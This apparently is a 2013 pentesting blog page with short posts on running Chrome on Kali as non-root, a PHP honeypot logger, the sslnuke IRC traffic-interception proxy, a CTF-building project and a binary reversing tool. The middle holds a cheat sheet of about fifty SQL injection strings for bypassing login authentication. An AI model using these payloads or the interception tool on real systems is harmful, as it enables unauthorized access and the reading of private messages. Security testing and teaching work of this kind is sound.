Sep 14, 2013

Howto: Google Chrom On Kali with nonroot user

1. Download Google Chrome

2. Install it
sudo dpkg -i google-chrome-stable_current_amd64.deb

3. Install sux
sudo apt-get instlal sux

4. Run google-chrome with sux
sux - nonroot google-chrome

5. Try see the owner of google-chrome process
ps -ef | grep google



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Sep 12, 2013

Honeypot: PHP Script For Honeypot

This php script logs all HTTP requests ( GET/POST/HEAD/etc ) into the
appropriate log files. Each line is a JSON entry. Files names are created
based on the day.  


Source: https://github.com/kbandla/exploitbay/tree/master/honeypot

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Sep 11, 2013

Tools: sslnuke - Transparent proxy that decrypts SSL traffic and prints out IRC messages.

HTTPS is not the only protocol that uses SSL. Unfortunately, many clients for these other protocols do not verify by default and even if they did, there is no guarantee of secure certificate transfer. After all, how many people are willing to pay $50 for an SSL certificate for their FTPS server?
A common protocol that uses SSL but is rarely verified is IRC. Many IRC clients verify by default, but most users will turn this off because IRC servers administrators tend not to purchase legitimate SSL certificates. Some popular clients even leave SSL verification off by default (IRSSI, for example). We already know that this is unwise, any attacker between a user and the IRC server can offer an invalid certificate and decrypt all of the user's traffic (including possibly sensitive messages). Most users don't even consider this fact when connecting to an SSL "secured" IRC server.
The purpose of sslnuke is to write a tool geared towards decrypting and intercepting "secured" IRC traffic. There are plenty of existing tools that intercept SSL traffic already, but most of these are geared towards HTTP traffic. sslnuke targets IRC directly in order to demonstrate how easy it is to intercept "secured" communications. sslnuke usage is simple.

Source: https://github.com/jtRIPper/sslnuke


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Build Your Own Capture The Flag

Remaster Linux Live CD images for the purpose of creating ready to use security wargames with pre-installed vulnerabilities to exploit.
 
 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Cheat Sheet: SQL Injection for Authentication Bypass

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
 




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Binrev- Automate Reversing Windows Binaries for Pentesters

What you can do with this?

  • Static analysis: you can do a basic manual code review for decompiled sources to discover hidden communication channels, search for hard-coded passwords, or SQL injection vulnerabilities.
  • Import decompiled projects to an IDE to reconstruct and modify the original source code
  • Call hidden native exported functions with rundll32
 Source: https://www.netspi.com/blog/entryid/196/binrev-automate-reversing-windows-binaries-for-pentesters


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |